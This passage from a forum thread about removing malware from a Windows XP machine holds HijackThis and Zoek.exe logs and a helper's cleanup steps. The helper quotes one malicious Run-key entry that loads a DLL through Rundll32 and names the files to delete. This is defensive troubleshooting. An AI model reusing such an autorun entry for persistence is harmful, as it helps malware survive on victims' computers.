          O8 - Extra context menu item: Convert selection to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
          O8 - Extra context menu item: Convert selection to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
          O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
          O8 - Extra context menu item: Convert to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
          O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
          O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
          O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
          O9 - Extra button: PokerStars - {3AD14F0C-ED16-4e43-B6D8-661B03F6A1EF} - C:\Program Files\PokerStars\PokerStarsUpdate.exe
          O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
          O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
          O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
          O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1201884219671
          O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
          O16 - DPF: {D821DC4A-0814-435E-9820-661C543A4679} (CRLDownloadWrapper Class) - http://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx
          O16 - DPF: {D83C1BD1-DCBB-11D4-9425-0050BF33FA6E} (CycloScopeLite Control) - http://www.cyclomedia.nl/download/components/CycloScopeLite.cab
          O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
          O22 - SharedTaskScheduler: Preloader van browseui - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
          O22 - SharedTaskScheduler: Cache-daemon voor onderdeelcategorieën - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
          O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
          O23 - Service: Adobe Version Cue CS2 - Adobe Systems Incorporated - C:\Program Files\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe
          O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
          O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
          O23 - Service: Norman eLogger service 6 (eLoggerSvc6) - Norman ASA - C:\Program Files\Norman\Npm\Bin\eLogsvc.exe
          O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
          O23 - Service: iPod-service (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
          O23 - Service: Macromedia Licensing Service - Unknown owner - C:\Program Files\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe
          O23 - Service: Nero BackItUp Scheduler 3 - Nero AG - C:\Program Files\Nero\Nero8\Nero BackItUp\NBService.exe
          O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Nero\Lib\NMIndexingService.exe
          O23 - Service: Norman NJeeves - Unknown owner - C:\Program Files\Norman\Npm\bin\NJEEVES.EXE
          O23 - Service: Norman ZANDA - Norman ASA - C:\Program Files\Norman\Npm\Bin\Zanda.exe
          O23 - Service: Norman Virus Control on-access component (nvcoas) - Norman ASA - C:\Program Files\Norman\Nvc\bin\nvcoas.exe
          O23 - Service: Norman Virus Control Scheduler (NVCScheduler) - Norman ASA - C:\Program Files\Norman\Nvc\BIN\NVCSCHED.EXE
          O23 - Service: PC Tools Auxiliary Service (sdAuxService) - PC Tools - C:\Program Files\Spyware Doctor\pctsAuxs.exe
          O23 - Service: PC Tools Security Service (sdCoreService) - PC Tools - C:\Program Files\Spyware Doctor\pctsSvc.exe
          O23 - Service: Webroot Spy Sweeper Engine (WebrootSpySweeperService) - Webroot Software, Inc. - C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe

          --
          End of file - 13024 bytes

          Is everything clean now?


          • #6
            It already looks a lot better.

            Try to remove this line with HijackThis:
            O4 - HKLM\..\Run: [BMbbad6e67] Rundll32.exe "C:\WINDOWS\system32\vlwosmpj.dll",s

            Also try to delete these files if they are still present:
            C:\WINDOWS\system32\vlwosmpj.dll
            C:\WINDOWS\BMbbad6e67.xml
            C:\WINDOWS\BMbbad6e67.txt

            If you cannot delete them, try it in safe mode.

            Download this file: zoek.exe
            Double-click it; after a while a log opens.
            Post the contents of this log in your next message.


            • #7
              - Line removed with HiJackThis
              - Opened Zoek.exe, see log below.

              ----a-w 0 2008-03-23 17:28:48 C:\WINDOWS\0.log
              ----a-w 0 2008-03-23 17:51:39 C:\WINDOWS\BMbbad6e67.txt
              --s-a-w 2,048 2008-03-23 17:28:41 C:\WINDOWS\bootstat.dat
              ----a-w 685,056 2008-03-23 16:28:12 C:\WINDOWS\isRS-000.tmp
              ----a-w 2,547 2008-03-23 12:57:50 C:\WINDOWS\KB912812.log
              ----a-w 42,906 2008-03-23 13:37:21 C:\WINDOWS\KB944533-IE7.log
              ----a-w 157,242 2008-03-23 13:18:19 C:\WINDOWS\ntbtlog.txt
              ----a-w 22 2008-03-23 17:29:09 C:\WINDOWS\pskt.ini
              ---ha-w 54,156 2008-03-23 17:29:17 C:\WINDOWS\QTFont.qfn
              ----a-w 29,394 2008-03-23 14:28:38 C:\WINDOWS\SchedLgU.Txt
              ----a-w 659,258 2008-03-17 17:13:23 C:\WINDOWS\setupapi.log
              ----a-w 227 2008-03-23 14:33:40 C:\WINDOWS\system.ini
              ----a-w 2,548 2008-03-23 12:32:29 C:\WINDOWS\unins000.dat
              ----a-w 691,545 2008-03-23 12:31:16 C:\WINDOWS\unins000.exe
              ----a-w 159 2008-03-23 17:28:49 C:\WINDOWS\wiadebug.log
              ----a-w 49 2008-03-23 17:28:49 C:\WINDOWS\wiaservc.log
              ----a-w 718 2008-03-23 14:33:40 C:\WINDOWS\win.ini
              ----a-w 1,711,998 2008-03-23 17:30:03 C:\WINDOWS\WindowsUpdate.log
              ----a-w 3,328 2008-03-12 02:01:47 C:\WINDOWS\Debug\mrt.log
              ----a-w 2,328 2008-03-12 02:01:47 C:\WINDOWS\Debug\mrteng.log
              ----a-w 0 2008-03-23 17:28:41 C:\WINDOWS\Debug\PASSWD.LOG
              -c--a-w 22,014 2008-03-23 13:37:21 C:\WINDOWS\ie7updates\KB944533-IE7\spuninst\spuninst.inf
              ----a-r 11,813,888 2008-03-17 11:48:50 C:\WINDOWS\Installer\2a6ae555.msp
              ----a-w 289,792 2008-03-15 01:05:49 C:\WINDOWS\Installer\b50bfe7.msi
              ----a-w 172,032 2008-03-15 01:04:29 C:\WINDOWS\Installer\MSI21F.tmp
              ----a-w 172,032 2008-03-15 01:04:38 C:\WINDOWS\Installer\MSI224.tmp
              ----a-r 7 2008-03-12 02:02:19 C:\WINDOWS\Installer\$PatchCache$\Managed\9040110900063D11C8EF10054038389C\CacheSize.txt
              ----a-r 172,032 2008-03-15 01:05:49 C:\WINDOWS\Installer\{3248F0A8-6813-11D6-A77B-00B0D0160050}\sp1033.MST
              ----a-r 593,920 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\accicons.exe
              ----a-r 12,288 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\cagicon.exe
              ----a-r 766 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\graph.ico
              ----a-r 86,016 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\inficon.exe
              ----a-r 135,168 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\misc.exe
              ----a-r 11,264 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\mspicons.exe
              ----a-r 27,136 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\oisicon.exe
              ----a-r 4,096 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\opwicon.exe
              ----a-r 794,624 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\outicon.exe
              ----a-r 249,856 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\pptico.exe
              ----a-r 61,440 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\pubs.exe
              ----a-r 23,040 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\unbndico.exe
              ----a-r 286,720 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\wordicon.exe
              ----a-r 409,600 2008-03-21 02:01:41 C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\xlicons.exe
              ----a-w 320 2008-03-23 11:37:58 C:\WINDOWS\pchealth\helpctr\Config\NewsSet.xml
              ----a-w 149,896 2008-03-23 11:38:36 C:\WINDOWS\pchealth\helpctr\Config\Cache\Personal_32_1043.dat.bak
              ----a-w 264 2008-03-23 11:38:00 C:\WINDOWS\pchealth\helpctr\Config\News\NewsHeadlines_1043_Personal.xml
              ----a-w 70,714 2008-03-23 11:37:58 C:\WINDOWS\pchealth\helpctr\Config\News\newsver.xml
              ----a-w 2,038 2008-03-20 23:56:35 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1017.xml
              ----a-w 2,038 2008-03-22 00:00:58 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1047.xml
              ----a-w 2,106 2008-03-22 00:00:59 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1057.xml
              ----a-w 44,850 2008-03-23 00:17:14 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1066.xml
              ----a-w 1,456 2008-03-23 00:17:14 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1068.xml
              ----a-w 40,410 2008-03-23 00:17:14 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1070.xml
              ----a-w 3,610 2008-03-23 00:17:14 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1072.xml
              ----a-w 17,810 2008-03-23 00:17:14 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1074.xml
              ----a-w 1,898 2008-03-23 00:17:14 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1076.xml
              ----a-w 2,038 2008-03-23 00:17:14 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1077.xml
              ----a-w 1,580 2008-03-23 00:17:14 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1078.xml
              ----a-w 29,446 2008-03-23 00:17:14 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1080.xml
              ----a-w 2,042 2008-03-23 00:17:14 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1082.xml
              ----a-w 569,128 2008-03-23 00:17:14 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1084.xml
              ----a-w 210,340 2008-03-23 00:17:15 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1086.xml
              ----a-w 2,100 2008-03-23 00:17:15 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1087.xml
              ----a-w 97,202 2008-03-23 00:17:15 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1088.xml
              ----a-w 6,296 2008-03-23 00:17:15 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1090.xml
              ----a-w 93,842 2008-03-23 00:17:15 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1092.xml
              ----a-w 8,205,252 2008-03-23 00:17:16 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_1094.xml
              ----a-w 2,038 2008-03-10 14:25:46 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_747.xml
              ----a-w 15,454 2008-03-10 14:25:47 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_757.xml
              ----a-w 2,924 2008-03-10 14:25:53 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_765.xml
              ----a-w 2,038 2008-03-12 21:30:10 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_777.xml
              ----a-w 3,806 2008-03-12 21:30:11 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_791.xml
              ----a-w 2,038 2008-03-13 21:34:32 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_807.xml
              ----a-w 2,100 2008-03-13 21:34:33 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_817.xml
              ----a-w 2,038 2008-03-14 22:08:43 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_837.xml
              ----a-w 2,106 2008-03-14 22:08:44 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_847.xml
              ----a-w 2,038 2008-03-15 23:21:15 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_867.xml
              ----a-w 1,912 2008-03-15 23:21:16 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_883.xml
              ----a-w 11,990 2008-03-15 23:21:22 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_885.xml
              ----a-w 2,038 2008-03-16 23:34:24 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_897.xml
              ----a-w 2,100 2008-03-16 23:34:25 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_907.xml
              ----a-w 2,038 2008-03-17 23:38:47 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_927.xml
              ----a-w 2,106 2008-03-17 23:38:47 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_937.xml
              ----a-w 2,038 2008-03-18 23:47:47 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_957.xml
              ----a-w 2,100 2008-03-18 23:47:48 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_967.xml
              ----a-w 2,038 2008-03-19 23:52:11 C:\WINDOWS\pchealth\helpctr\DataColl\CollectedData_987.xml
              ----a-w 27,996 2008-03-23 00:17:22 C:\WINDOWS\pchealth\helpctr\DataColl\history_db.xml
              ----a-w 12,650 2008-03-23 11:43:38 C:\WINDOWS\Prefetch\17PHOLMES2000352.EXE-2C677BBF.pf
              ----a-w 86,768 2008-03-21 13:27:26 C:\WINDOWS\Prefetch\ACROBAT.EXE-02932E19.pf
              ----a-w 47,818 2008-03-22 20:45:05 C:\WINDOWS\Prefetch\ACROBATINFO.EXE-0372BF03.pf
              ----a-w 50,966 2008-03-23 13:38:28 C:\WINDOWS\Prefetch\ADOBELMSVC.EXE-0589E292.pf
              ----a-w 65,218 2008-03-23 13:38:30 C:\WINDOWS\Prefetch\ADOBELM_CLEANUP.0001-1438DE4B.pf
              ----a-w 76,228 2008-03-23 14:25:32 C:\WINDOWS\Prefetch\ASWS.EXE-3850FD86.pf
              ----a-w 16,532 2008-03-13 18:03:51 C:\WINDOWS\Prefetch\CALC.EXE-02CD573A.pf
              ----a-w 10,888 2008-03-20 10:24:25 C:\WINDOWS\Prefetch\CCLAW.EXE-25318A5F.pf
              ----a-w 94,496 2008-03-23 14:25:32 C:\WINDOWS\Prefetch\CLI.EXE-2A5BE79C.pf
              ----a-w 15,194 2008-03-23 11:43:31 C:\WINDOWS\Prefetch\CMD.EXE-087B4001.pf
              ----a-w 43,344 2008-03-15 21:48:49 C:\WINDOWS\Prefetch\CSTART.EXE-1EDA82DF.pf
              ----a-w 127,530 2008-03-22 00:16:00 C:\WINDOWS\Prefetch\DEFRAG.EXE-273F131E.pf
              ----a-w 75,884 2008-03-22 00:16:00 C:\WINDOWS\Prefetch\DFRGNTFS.EXE-269967DF.pf
              ----a-w 20,790 2008-03-21 06:46:05 C:\WINDOWS\Prefetch\DLLHOST.EXE-205D880D.pf
              ----a-w 54,260 2008-03-15 10:26:08 C:\WINDOWS\Prefetch\DRWTSN32.EXE-2B4B52AC.pf
              ----a-w 60,084 2008-03-17 17:13:42 C:\WINDOWS\Prefetch\DUMPREP.EXE-1B46F901.pf
              ----a-w 23,356 2008-03-15 00:49:07 C:\WINDOWS\Prefetch\DW20.EXE-22C39A55.pf
              ----a-w 28,412 2008-03-17 17:13:46 C:\WINDOWS\Prefetch\DWWIN.EXE-30875ADC.pf
              ----a-w 25,870 2008-03-15 21:48:27 C:\WINDOWS\Prefetch\EVEREST POKER.EXE-33F19199.pf
              ----a-w 66,306 2008-03-18 19:27:33 C:\WINDOWS\Prefetch\EXCEL.EXE-13B3F319.pf
              ----a-w 97,996 2008-03-23 12:48:57 C:\WINDOWS\Prefetch\EXPLORER.EXE-082F38A9.pf
              ----a-w 82,042 2008-03-15 12:16:04 C:\WINDOWS\Prefetch\FIREFOX.EXE-09ED6DBB.pf
              ----a-w 89,022 2008-03-23 12:50:13 C:\WINDOWS\Prefetch\FIREFOX.EXE-28641590.pf
              ----a-w 53,052 2008-03-15 10:26:13 C:\WINDOWS\Prefetch\GINSTALL.EXE-2C0C79BC.pf
              ----a-w 10,112 2008-03-20 10:24:49 C:\WINDOWS\Prefetch\GINSTALL.EXE-39D65A2C.pf
              ----a-w 72,802 2008-03-23 14:25:32 C:\WINDOWS\Prefetch\GOOGLEUPDATER.EXE-2CAF5929.pf
              ----a-w 58,462 2008-03-23 11:38:04 C:\WINDOWS\Prefetch\HELPCTR.EXE-3862B6F5.pf
              ----a-w 36,342 2008-03-23 11:38:07 C:\WINDOWS\Prefetch\HELPHOST.EXE-247D2792.pf
              ----a-w 233,808 2008-03-23 11:38:06 C:\WINDOWS\Prefetch\HELPSVC.EXE-2878DDA2.pf
              ----a-w 57,226 2008-03-23 12:53:14 C:\WINDOWS\Prefetch\HITMANPRO2.EXE-002E39B0.pf
              ----a-w 119,146 2008-03-23 14:25:32 C:\WINDOWS\Prefetch\IEXPLORE.EXE-27122324.pf
              ----a-w 18,300 2008-03-23 11:36:57 C:\WINDOWS\Prefetch\IMAPI.EXE-0BF740A4.pf
              ----a-w 12,086 2008-03-23 11:43:16 C:\WINDOWS\Prefetch\INSTALL.EXE-30B9C453.pf
              ----a-w 8,580 2008-03-15 01:06:00 C:\WINDOWS\Prefetch\JAVA.EXE-04FA6B41.pf
              ----a-w 12,106 2008-03-15 00:07:42 C:\WINDOWS\Prefetch\JAVA.EXE-0539FACC.pf
              ----a-w 37,710 2008-03-15 01:06:16 C:\WINDOWS\Prefetch\JAVAW.EXE-03C5992A.pf
              ----a-w 30,788 2008-03-15 01:04:33 C:\WINDOWS\Prefetch\JRE-6U5-WINDOWS-I586-P-IFTW_1-1DAB5218.pf
              ----a-w 36,744 2008-03-15 00:07:52 C:\WINDOWS\Prefetch\JUCHECK.EXE-17305A81.pf
              ----a-w 12,830 2008-03-23 11:43:05 C:\WINDOWS\Prefetch\KEYGEN.EXE-1D236EC6.pf
              ----a-w 5,952 2008-03-15 01:05:59 C:\WINDOWS\Prefetch\LAUNCHER.EXE-060FE09B.pf
              ----a-w 622,882 2008-03-23 03:44:59 C:\WINDOWS\Prefetch\Layout.ini
              ----a-w 18,694 2008-03-21 00:50:53 C:\WINDOWS\Prefetch\MPAS-D.EXE-2F969366.pf
              ----a-w 38,604 2008-03-23 13:44:35 C:\WINDOWS\Prefetch\MPCMDRUN.EXE-1F9D1CA1.pf
              ----a-w 14,964 2008-03-19 00:50:31 C:\WINDOWS\Prefetch\MPSIGSTUB.EXE-08653309.pf
              ----a-w 15,434 2008-03-21 00:50:53 C:\WINDOWS\Prefetch\MPSIGSTUB.EXE-0C7CF8B3.pf
              ----a-w 14,980 2008-03-13 21:16:49 C:\WINDOWS\Prefetch\MPSIGSTUB.EXE-1A64C729.pf
              ----a-w 89,192 2008-03-21 02:01:45 C:\WINDOWS\Prefetch\MSIEXEC.EXE-2F8A8CAE.pf
              ----a-w 9,742 2008-03-21 02:01:45 C:\WINDOWS\Prefetch\MSOHTMED.EXE-1BD4AAD2.pf
              ----a-w 87,354 2008-03-14 13:30:31 C:\WINDOWS\Prefetch\MSVS.EXE-129B5DE4.pf
              ----a-w 49,278 2008-03-23 11:38:33 C:\WINDOWS\Prefetch\NERO.EXE-39268565.pf
              ----a-w 37,948 2008-03-23 11:43:04 C:\WINDOWS\Prefetch\NERO_8.2.8.0_SERIAL.TXT.EXE-281E0A02.pf
              ----a-w 10,884 2008-03-20 10:24:49 C:\WINDOWS\Prefetch\NIP.EXE-228A4FF5.pf
              ----a-w 23,968 2008-03-23 10:24:16 C:\WINDOWS\Prefetch\NIU.EXE-041D58EE.pf
              ----a-w 66,912 2008-03-23 14:21:00 C:\WINDOWS\Prefetch\NOTEPAD.EXE-336351A9.pf
              ----a-w 8,348 2008-03-20 10:24:49 C:\WINDOWS\Prefetch\NSE.EXE-248A9306.pf
              ----a-w 1,590,946 2008-03-23 14:25:32 C:\WINDOWS\Prefetch\NTOSBOOT-B00DFAAD.pf
              ----a-w 11,182 2008-03-20 10:24:32 C:\WINDOWS\Prefetch\NVCOA.EXE-34A6640C.pf
              ----a-w 14,134 2008-03-20 10:24:56 C:\WINDOWS\Prefetch\NVCOAS.EXE-275A764F.pf
              ----a-w 13,100 2008-03-20 10:24:42 C:\WINDOWS\Prefetch\NVCSCHED.EXE-2CCE897E.pf
              ----a-w 87,286 2008-03-18 22:53:08 C:\WINDOWS\Prefetch\OMNIPAGE.EXE-0C9EF492.pf
              ----a-w 12,278 2008-03-18 22:53:08 C:\WINDOWS\Prefetch\OPA11.EXE-0A9E3482.pf
              ----a-w 6,584 2008-03-21 02:01:43 C:\WINDOWS\Prefetch\OSE.EXE-108AC98F.pf
              ----a-w 10,640 2008-03-23 12:53:45 C:\WINDOWS\Prefetch\PACRYPT.EXE-2B5988BA.pf
              ----a-w 45,200 2008-03-15 01:06:01 C:\WINDOWS\Prefetch\PATCHJRE.EXE-1834E785.pf
              ----a-w 77,586 2008-03-23 13:42:20 C:\WINDOWS\Prefetch\PHOTOSHOP.EXE-0234D846.pf
              ----a-w 18,378 2008-03-17 18:48:35 C:\WINDOWS\Prefetch\PING.EXE-31216D26.pf
              ----a-w 12,088 2008-03-13 17:56:32 C:\WINDOWS\Prefetch\QTTASK.EXE-342507FB.pf
              ----a-w 34,666 2008-03-17 21:56:03 C:\WINDOWS\Prefetch\RUNDLL32.EXE-12D6D1AE.pf
              ----a-w 21,248 2008-03-17 13:41:59 C:\WINDOWS\Prefetch\RUNDLL32.EXE-12E27DD0.pf
              ----a-w 35,338 2008-03-21 13:42:30 C:\WINDOWS\Prefetch\RUNDLL32.EXE-173B6BF9.pf
              ----a-w 31,010 2008-03-14 11:57:23 C:\WINDOWS\Prefetch\RUNDLL32.EXE-17A7DE0F.pf
              ----a-w 25,764 2008-03-23 11:47:35 C:\WINDOWS\Prefetch\RUNDLL32.EXE-1993CD82.pf
              ----a-w 18,254 2008-03-14 12:08:23 C:\WINDOWS\Prefetch\RUNDLL32.EXE-19DA8F15.pf
              ----a-w 24,686 2008-03-23 13:42:20 C:\WINDOWS\Prefetch\RUNDLL32.EXE-1A0CEA1E.pf
              ----a-w 61,704 2008-03-18 12:05:38 C:\WINDOWS\Prefetch\RUNDLL32.EXE-1A8ABFA3.pf
              ----a-w 18,254 2008-03-14 12:08:34 C:\WINDOWS\Prefetch\RUNDLL32.EXE-1C7DEA22.pf
              ----a-w 26,944 2008-03-15 22:37:36 C:\WINDOWS\Prefetch\RUNDLL32.EXE-21A91014.pf
              ----a-w 20,130 2008-03-23 11:50:29 C:\WINDOWS\Prefetch\RUNDLL32.EXE-21AE48C6.pf
              ----a-w 17,362 2008-03-23 11:49:17 C:\WINDOWS\Prefetch\RUNDLL32.EXE-264D4AF9.pf
              ----a-w 18,310 2008-03-18 13:18:36 C:\WINDOWS\Prefetch\RUNDLL32.EXE-268BFF96.pf
              ----a-w 26,864 2008-03-14 12:09:52 C:\WINDOWS\Prefetch\RUNDLL32.EXE-27004236.pf
              ----a-w 74,810 2008-03-17 17:35:02 C:\WINDOWS\Prefetch\RUNDLL32.EXE-2850295C.pf
              ----a-w 18,254 2008-03-23 11:47:46 C:\WINDOWS\Prefetch\RUNDLL32.EXE-2C449C4E.pf
              ----a-w 63,354 2008-03-17 17:32:10 C:\WINDOWS\Prefetch\RUNDLL32.EXE-2C91BA85.pf
              ----a-w 20,288 2008-03-23 11:50:20 C:\WINDOWS\Prefetch\RUNDLL32.EXE-2C98EDDD.pf
              ----a-w 29,846 2008-03-14 13:30:45 C:\WINDOWS\Prefetch\RUNDLL32.EXE-2E5B29AB.pf
              ----a-w 23,172 2008-03-23 11:51:54 C:\WINDOWS\Prefetch\RUNDLL32.EXE-302705EF.pf
              ----a-w 18,352 2008-03-23 11:47:39 C:\WINDOWS\Prefetch\RUNDLL32.EXE-307B577E.pf
              ----a-w 18,254 2008-03-23 11:48:48 C:\WINDOWS\Prefetch\RUNDLL32.EXE-3B11AB06.pf
              ----a-w 22,204 2008-03-23 11:51:29 C:\WINDOWS\Prefetch\RUNDLL32.EXE-3D949BE9.pf
              ----a-w 18,760 2008-03-18 22:53:09 C:\WINDOWS\Prefetch\RUNDLL32.EXE-3F1C419C.pf
              ----a-w 27,478 2008-03-21 13:33:33 C:\WINDOWS\Prefetch\RUNDLL32.EXE-3F9377ED.pf
              ----a-w 27,106 2008-03-14 12:08:26 C:\WINDOWS\Prefetch\RUNDLL32.EXE-404209AA.pf
              ----a-w 40,564 2008-03-17 17:32:07 C:\WINDOWS\Prefetch\RUNDLL32.EXE-40F34A69.pf
              ----a-w 26,040 2008-03-15 12:39:39 C:\WINDOWS\Prefetch\RUNDLL32.EXE-4177EBC0.pf
              ----a-w 25,056 2008-03-13 17:10:30 C:\WINDOWS\Prefetch\RUNDLL32.EXE-41870121.pf
              ----a-w 38,346 2008-03-17 17:32:05 C:\WINDOWS\Prefetch\RUNDLL32.EXE-42BAC0DB.pf
              ----a-w 18,706 2008-03-23 11:36:51 C:\WINDOWS\Prefetch\RUNDLL32.EXE-451FC2C0.pf
              ----a-w 23,048 2008-03-23 12:38:11 C:\WINDOWS\Prefetch\RUNDLL32.EXE-454B012A.pf
              ----a-w 24,886 2008-03-13 17:10:52 C:\WINDOWS\Prefetch\RUNDLL32.EXE-45B7B3C3.pf
              ----a-w 18,254 2008-03-13 17:41:34 C:\WINDOWS\Prefetch\RUNDLL32.EXE-47F7862F.pf
              ----a-w 32,834 2008-03-14 11:06:03 C:\WINDOWS\Prefetch\RUNDLL32.EXE-4CDAA44E.pf
              ----a-w 22,216 2008-03-23 12:31:26 C:\WINDOWS\Prefetch\SBSD152UPD.EXE-095A0D85.pf
              ----a-w 27,746 2008-03-23 12:31:27 C:\WINDOWS\Prefetch\SBSD152UPD.TMP-24DA4806.pf
              ----a-w 61,774 2008-03-23 11:40:47 C:\WINDOWS\Prefetch\SETUPX.EXE-378D7205.pf
              ----a-w 61,460 2008-03-21 06:46:10 C:\WINDOWS\Prefetch\SOFTWAREUPDATE.EXE-1415D1B8.pf
              ----a-w 93,822 2008-03-23 12:54:11 C:\WINDOWS\Prefetch\SPYBOTSD.EXE-1344276B.pf
              ----a-w 66,264 2008-03-23 12:54:17 C:\WINDOWS\Prefetch\SPYSWEEPERUI.EXE-360592DC.pf
              ----a-w 32,866 2008-03-23 12:47:03 C:\WINDOWS\Prefetch\TASKMGR.EXE-20256C55.pf
              ----a-w 97,560 2008-03-23 12:27:52 C:\WINDOWS\Prefetch\THUNDERBIRD.EXE-38CA75D9.pf
              ----a-w 104,240 2008-03-12 20:22:45 C:\WINDOWS\Prefetch\THUNDE~1.EXE-360E0082.pf
              ----a-w 52,020 2008-03-15 01:05:59 C:\WINDOWS\Prefetch\UNPACK200.EXE-215A2047.pf
              ----a-w 20,364 2008-03-23 12:31:16 C:\WINDOWS\Prefetch\UPDATE.EXE-131667C7.pf
              ----a-w 29,468 2008-03-23 11:41:46 C:\WINDOWS\Prefetch\UTORRENT.EXE-3888D1B0.pf
              ----a-w 24,414 2008-03-23 14:25:32 C:\WINDOWS\Prefetch\VERCLSID.EXE-3667BD89.pf
              ----a-w 23,002 2008-03-18 22:53:10 C:\WINDOWS\Prefetch\WIAACMGR.EXE-212ED878.pf
              ----a-w 63,262 2008-03-23 12:42:18 C:\WINDOWS\Prefetch\WINAMP.EXE-0D0189CA.pf
              ----a-w 21,322 2008-03-15 20:16:32 C:\WINDOWS\Prefetch\WINAMP552_LITE_NL-NL[1].EXE-245BB9F2.pf
